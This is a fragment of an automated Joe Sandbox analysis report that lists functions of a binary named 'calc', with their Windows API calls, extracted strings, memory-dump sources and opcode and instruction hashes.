    • Opcode Fuzzy Hash: 7515e139fb4bb4e1bd99acf1861c07cc37c553c4cb4bd1ee9d3f4938d929fa9e
    • Instruction Fuzzy Hash: 6DF0A9B6400B49AADB31E7B9DC48BC7B7EC6F85200F054D2AD696C3525DA78F189CB14
    Function 0040C8FD Relevance: 10.7, APIs: 7, Instructions: 233COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
      • Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
      • Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD
    • MoveToEx.GDI32(?,?,?,00000000), ref: 0040C9B0
    • AngleArc.GDI32(00000008,?,?,00000000,?,?), ref: 0040C9FD
      • Part of subcall function 0040CF77: MoveToEx.GDI32(?,00000000,00000001,00000000), ref: 0040CFC3
      • Part of subcall function 0040CF77: _logf.LIBCPMT ref: 0040CFD6
      • Part of subcall function 0040CF77: _logf.LIBCPMT ref: 0040CFF4
      • Part of subcall function 0040CF77: LineTo.GDI32(?,?,00000001), ref: 0040D010
    • LineTo.GDI32(00000008,?,?), ref: 0040CA0F
    • CloseFigure.GDI32(00000008), ref: 0040CA18
    • Ellipse.GDI32(?,?,?,?,?), ref: 0040CA6A
    • Rectangle.GDI32(?,?,?,?,?), ref: 0040CB28
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Object$LineMoveSelect_logf$AngleBeginCloseCreateDeleteEllipseFigurePathRectangle
    • String ID:
    • API String ID: 2270488568-0
    • Opcode ID: 3e41277f35241731e5ecdc64cb86dd8e478581ef2b495140d12ab5893bf93d11
    • Instruction ID: b80d5d34312ecd98a02386c7250854dbc6076191505cc9a654b0a8d9ac695662
    • Opcode Fuzzy Hash: 3e41277f35241731e5ecdc64cb86dd8e478581ef2b495140d12ab5893bf93d11
    • Instruction Fuzzy Hash: 4B915C70900209EFDF11CFA8CC89AAEBBB5FF44314F14426AE815B62A1C739AD51DF58
    Function 00409A3B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON
    Download Yara Rule
    APIs
    • GetClientRect.USER32(?,?), ref: 00409A8D
    • GetWindowRect.USER32(?,?), ref: 00409ABC
    • GetClientRect.USER32(00000400,?), ref: 00409B03
    • GetWindowRect.USER32(?,?), ref: 00409B4D
    • ScreenToClient.USER32(00000400,?), ref: 00409B72
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Rect$Client$Window$Screen
    • String ID: `
    • API String ID: 1296646539-2679148245
    • Opcode ID: 979626e2387a37fc5672180711e3e3b7af98162ae0c42364082c39fbb8a1b67d
    • Instruction ID: 5c22e1647285930d546eea6ccc3219bc4b63db07404db36e62ebad6edb330b87
    • Opcode Fuzzy Hash: 979626e2387a37fc5672180711e3e3b7af98162ae0c42364082c39fbb8a1b67d
    • Instruction Fuzzy Hash: 23917E79A00649EBDB14CFA8C5846AEFBF1FF48304F14452AD992B37A1D734AE40CB58
    Function 0042F7A7 Relevance: 10.7, APIs: 7, Instructions: 198networkCOMMON
    Download Yara Rule
    APIs
    • inet_ntoa.WSOCK32(?,00000000,?,?,00000000,?,00000010,00000000,00000001,00000000,?,00000000,00000000,?,0045C6D0), ref: 0042F8FC
    • htons.WSOCK32(?,00000000,?,00000000,?,?,00000000,?,00000010,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0042F937
    • _strlen.LIBCMT ref: 0042F97A
      • Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide_strlen$htonsinet_ntoa
    • String ID:
    • API String ID: 1318844614-0
    • Opcode ID: 32726be68eae4bb653f51ccd588e494280d40c1ed21dd2b48a9f8a1f6bdba186
    • Instruction ID: c535e4b204a39ed9355a5e9411ff9199073cd6162e92b6e8affce4dc956cf509
    • Opcode Fuzzy Hash: 32726be68eae4bb653f51ccd588e494280d40c1ed21dd2b48a9f8a1f6bdba186
    • Instruction Fuzzy Hash: FB61B331500124ABDB10EFA5D8819DFB7B8EF45324BA4417BF814EB281DB38DD85CBA9
    Function 004505A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON
    Download Yara Rule
    APIs
    • GetStartupInfoA.KERNEL32(?), ref: 00450603
    • GetFileType.KERNEL32(?), ref: 004506AD
    • GetStdHandle.KERNEL32(-000000F6), ref: 0045072E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FileHandleInfoStartupType
    • String ID: dH
    • API String ID: 2461013171-846699462
    • Opcode ID: dfafbd4248253cfbb645f4fc2627be0d24eb6d08c8f1592bb236bc200f1e9847
    • Instruction ID: 571e7180ef913d33cbf7ce2b326ee305126e63e0fb4f845115fe28abbe455c90
    • Opcode Fuzzy Hash: dfafbd4248253cfbb645f4fc2627be0d24eb6d08c8f1592bb236bc200f1e9847
    • Instruction Fuzzy Hash: D551E8791047418FC7248F28D8847267BE4FB55326F184A6ED9A6C72E3D738E85DCB09
    Function 00402C56 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 165COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID: CLASS$CLASSNN$INSTANCE$TEXT
    • API String ID: 0-360593746
    • Opcode ID: 9623d17dea9eae6fbb3f666b33aaf0732a1cc333ad8618f3fe136eeb59b5d510
    • Instruction ID: 90914070af9fba80fa788633ee5ae74fbcd90560cc3f0575e79a59277e522c31
    • Opcode Fuzzy Hash: 9623d17dea9eae6fbb3f666b33aaf0732a1cc333ad8618f3fe136eeb59b5d510
    • Instruction Fuzzy Hash: B751D37194525ABECB01DF65C8445DEFF74BF04304B44816FE818A3A82C779F869CBA8
    Function 0042BE53 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0042EFD5: GetForegroundWindow.USER32(?), ref: 0042EFDB
      • Part of subcall function 0042EFD5: GetWindowRect.USER32(00000000,?), ref: 0042EFED
    • GetDesktopWindow.USER32 ref: 0042BE7A
    • GetWindowRect.USER32(00000000), ref: 0042BE81
    • mouse_event.USER32(00008001,?,00000001,00000000,00000000), ref: 0042BEB5
      • Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 0041602B
    • GetCursorPos.USER32(?), ref: 0042BEDD
    • mouse_event.USER32(00008001,?,0000000B,00000000,00000000), ref: 0042BF9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
    • String ID: d
    • API String ID: 4137160315-2564639436
    • Opcode ID: a7507ff59d1f84e5e95a0c053b09d558c46e193066ca54b7beac4dc000bdcc94
    • Instruction ID: 1eca856535500a1089d069f95856a78e939d7b0643273a579d4f7235f62430b1
    • Opcode Fuzzy Hash: a7507ff59d1f84e5e95a0c053b09d558c46e193066ca54b7beac4dc000bdcc94
    • Instruction Fuzzy Hash: 004117727007269BDF208FA9AD84BAE73A5EB44304F52853BF914D7281D778DC818BD8
    Function 00420ACC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 133COMMON
    Download Yara Rule
    APIs
    • CharUpperBuffW.USER32(00000000,?,@GUI_CTRLID,?,00479E08,?,00479BD8,0042018E,00000000,00479E08,00479E08,00479E08), ref: 00420B68
    • CharUpperBuffW.USER32(004203AA,00479E08,@GUI_WINHANDLE,?,0047BD20,00000000,?), ref: 00420BA5
    • CharUpperBuffW.USER32(?,?,@GUI_CTRLHANDLE,?,0047BD20,004203AA,?), ref: 00420BE2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharUpper
    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
    • API String ID: 3964851224-758534266
    • Opcode ID: 245d609bba9c7a4096270049bf6b3d35cd90ee5238671eac7b2abce18bc83694
    • Instruction ID: 0670a5c02a3ad987be2aa7fb96b886d40dde11566c37022459f53628aa54ba14
    • Opcode Fuzzy Hash: 245d609bba9c7a4096270049bf6b3d35cd90ee5238671eac7b2abce18bc83694
    • Instruction Fuzzy Hash: 8941B67194012CABCF21EBA6DD45AEE7BB9EF04304F24016BF805B7122CB796D46DB64
    Function 00405E8E Relevance: 10.6, APIs: 7, Instructions: 121keyboardCOMMON
    Download Yara Rule
    APIs
    • GetCursorPos.USER32(?), ref: 00405E9B
    • ScreenToClient.USER32(?,?), ref: 00405EB8
    • GetAsyncKeyState.USER32(00000001), ref: 00405EFB
    • GetKeyState.USER32(00000001), ref: 00405F09
    • GetAsyncKeyState.USER32(00000002), ref: 00405F23
    • GetKeyState.USER32(00000002), ref: 00405F2C
    • 73A245F0.USER32(?,000000F0), ref: 00405F7C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: State$Async$A245ClientCursorScreen
    • String ID:
    • API String ID: 1554364681-0
    • Opcode ID: 301c061da2982d33ea52afccf9ac44063f1c88073db3f05418d096a3cc27a1ec
    • Instruction ID: a365285c24f84e057ec1b9af2304b33fffce20543d84946f93603c3a6ce3a238
    • Opcode Fuzzy Hash: 301c061da2982d33ea52afccf9ac44063f1c88073db3f05418d096a3cc27a1ec
    • Instruction Fuzzy Hash: 1E41AB71404A05EBCF208FA4C844BEFBBB4FF54325F20852AE565762D1C339A980CF19
    Function 004145F8 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00416372: LoadLibraryA.KERNEL32(kernel32.dll,0041461F,74DF0F00,00479E08), ref: 0041637D
      • Part of subcall function 00416372: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F
    • FreeLibrary.KERNEL32(00479E08,74DF0F00,00479E08), ref: 0041476B
      • Part of subcall function 00416399: LoadLibraryA.KERNEL32(kernel32.dll,00414630,74DF0F00,00479E08), ref: 004163A4
      • Part of subcall function 00416399: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6
    • FreeLibrary.KERNEL32(00000000,74DF0F00,00479E08), ref: 0041475D
      • Part of subcall function 004163C0: LoadLibraryA.KERNEL32(kernel32.dll,00414641,74DF0F00,00479E08), ref: 004163CB
      • Part of subcall function 004163C0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD
    • CloseHandle.KERNEL32(00000000), ref: 00414719
    • FreeLibrary.KERNEL32(?), ref: 0041472D
    • FreeLibrary.KERNEL32(00000000), ref: 00414737
    • FreeLibrary.KERNEL32(00479E08), ref: 00414741
    • FreeLibrary.KERNEL32(?,74DF0F00,00479E08), ref: 0041474F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$AddressLoadProc$CloseHandle
    • String ID:
    • API String ID: 59553586-0
    • Opcode ID: 7bc2e15a2c08dfa422e9ee046e246841171260878f1cd2375263530d5d94805e
    • Instruction ID: 27dac92add9ddf9618ea19e3f12248affa182d011fb36f9912dfa0d6a51cbeb4
    • Opcode Fuzzy Hash: 7bc2e15a2c08dfa422e9ee046e246841171260878f1cd2375263530d5d94805e
    • Instruction Fuzzy Hash: 03413A71C0021EEBCF11AFA1CC848EEBBB8BF49305F1440ABE515A2141D7389AC5CF99
    Function 00408BF0 Relevance: 10.6, APIs: 7, Instructions: 94windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00408C0D
    • 73A245F0.USER32(00000000,000000F0), ref: 00408C36
    • 73A245F0.USER32(00000000,000000F0), ref: 00408C67
    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00408C96
    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00408CBA
    • 73A245F0.USER32(00000000,000000F0,?,000000F0,00000000,00000000), ref: 00408CCC
    • 73A259E0.USER32(00000000,000000F0,00000000,?,000000F0,00000000,00000000), ref: 00408CDE
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A245MessageSend$A259
    • String ID:
    • API String ID: 3343449764-0
    • Opcode ID: 7054d6b9f3c2a66ea68298b1084cba7101c21c6ece3fab23c9b3be1219fbb7f7
    • Instruction ID: e8c8df3eaf7ccf9b38dfe8bddefedc0c0ea333e00af5292c8d3d649401530b54
    • Opcode Fuzzy Hash: 7054d6b9f3c2a66ea68298b1084cba7101c21c6ece3fab23c9b3be1219fbb7f7
    • Instruction Fuzzy Hash: 7631B231149315AFFB228F18DE84F1177B4FB01310F10027AF492A62E5DB74EC54CA6A
    Function 0040850D Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
    Download Yara Rule
    APIs
    • DeleteObject.GDI32(?), ref: 00408529
    • 73A1A570.USER32(00000000,?,00000001,?), ref: 00408530
    • 73A24620.GDI32(00000000,0000005A), ref: 0040853C
    • 73A1A480.USER32(00000000,?), ref: 00408549
    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000002,000000FF,000000FF,000000FF,00000001,00000004,00000000,00000002,00000000,?), ref: 00408582
    • SendMessageW.USER32(000000FF,00000030,00000000,00000001), ref: 00408592
    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004085BA
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A24620A480A570CreateDeleteFontMessageMoveObjectSendWindow
    • String ID:
    • API String ID: 3066456267-0
    • Opcode ID: 87d978335de6d63e769d116ec5567d66e3bca6e5e14d1150b9a6aef3f29b13dc
    • Instruction ID: 7cb732dccc17f47e5e950ce36faa7ffa03e08c593cb8184f061ced94b1689c05
    • Opcode Fuzzy Hash: 87d978335de6d63e769d116ec5567d66e3bca6e5e14d1150b9a6aef3f29b13dc
    • Instruction Fuzzy Hash: F72190B2600604FFE7108FA4DD89EAB7BECEB58706F040429F642E6291D675DD40CB60
    Function 0040B7B2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040B82D
    • IsMenu.USER32(?), ref: 0040B840
    • CreatePopupMenu.USER32 ref: 0040B84A
    • InsertMenuItemW.USER32(?,?,00000001,0000002C), ref: 0040B880
    • DrawMenuBar.USER32(?), ref: 0040B888
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$Item$CreateDrawInfoInsertPopup
    • String ID: ,
    • API String ID: 2727366139-3772416878
    • Opcode ID: 5bda6680cf02f1709b1c8040744c8a64ce94f6e4f8689a38d774f8be7eb7a155
    • Instruction ID: 73ffb52debe41e485c73ce9743448b5bc55771eeef5cff0f8f225e8659b42da2
    • Opcode Fuzzy Hash: 5bda6680cf02f1709b1c8040744c8a64ce94f6e4f8689a38d774f8be7eb7a155
    • Instruction Fuzzy Hash: DF318C76900208EFDF10DF54D984ADABBB9FF48304F10816AE911AB3A1D735ED05DB98
    Function 0040B225 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0040B28B
    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0040B29A
    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0040B2A5
    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0040B2B4
    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0040B2C0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: Msctls_Progress32
    • API String ID: 3850602802-3636473452
    • Opcode ID: 937d72351a3cffb958232a75d02b7208b3851732dd46308458e1c1bc3b089544
    • Instruction ID: 52bfa3c8ca57206c5aefe15543c0d5c9767dcfa2ca37888765e00b3bca3ed78b
    • Opcode Fuzzy Hash: 937d72351a3cffb958232a75d02b7208b3851732dd46308458e1c1bc3b089544
    • Instruction Fuzzy Hash: C6114CB150020DBFEF119F51CC85EDA7F69EB083A8F11416AFA18361E1C7769C61DB98
    Function 00414469 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52windowCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000100,?,0045C6D0), ref: 0041448D
    • LoadStringW.USER32(00000000), ref: 00414496
    • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000100), ref: 004144A5
    • LoadStringW.USER32(00000000), ref: 004144A8
    • MessageBoxW.USER32(0047BD30,?,?,00011010), ref: 004144EF
    Strings
    • %s (%d) : ==> %s: %s %s, xrefs: 004144CA
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: HandleLoadModuleString$Message
    • String ID: %s (%d) : ==> %s: %s %s
    • API String ID: 4072794657-3128320259
    • Opcode ID: 03e62e4c2e52b1cd091c8559f5e88ecf3355c8990eab41007b3b5120228d8c5d
    • Instruction ID: f482db0144711750f8ad3975750deea825f68ac064d00ccfce29163d0917d0ef
    • Opcode Fuzzy Hash: 03e62e4c2e52b1cd091c8559f5e88ecf3355c8990eab41007b3b5120228d8c5d
    • Instruction Fuzzy Hash: C8017CF690021DBBEB11AB94DD45FEB77ACEB48345F0040A2BB04E6081D6749E898BB4
    Function 0044C2B2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00000000,0044D91A,0044C69D,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4), ref: 0044C2B4
